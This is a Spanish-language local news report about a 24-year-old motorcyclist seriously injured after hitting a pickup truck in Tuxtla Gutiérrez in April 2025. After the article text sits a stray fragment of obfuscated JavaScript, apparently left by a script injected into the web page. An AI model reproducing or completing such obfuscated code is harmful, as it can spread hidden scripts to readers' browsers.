Motociclista resultó herido de gravedad al chocar contra camioneta

Jairo Camacho.

Agencia ReporteCiudadano, 3 de abril del 2025. Tuxtla Gutiérrez.- Este jueves por la mañana el conductor de una motocicleta resultó herido de gravedad luego de chocar contra una camioneta cuando circulaba a la altura de la 9a Norte y esquina de la 2a Poniente del Barrio Colón.

Los reportes oficiales informaron que, este hecho ocurrió cuando Francisco Javier de 24 años circulaba en una Italika de color negro de Sur a Norte y se atravesó sin precaución y se impactó contra una Pick Up de color celeste.

Por el fuerte golpe salió volando y la moto se estrelló contra un Mazda de color rojo que estaba estacionado.

Al lugar arribaron paramédicos de la Cruz Roja y Bomberos para atender al lesionado que resultó con traumatismo craneoencefálico y fue trasladado al hospital Gilberto Gómez Maza.

Los dos vehículos fueron levantados y puestos a disposición del Ministerio Público en turno para deslindar responsabilidades.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *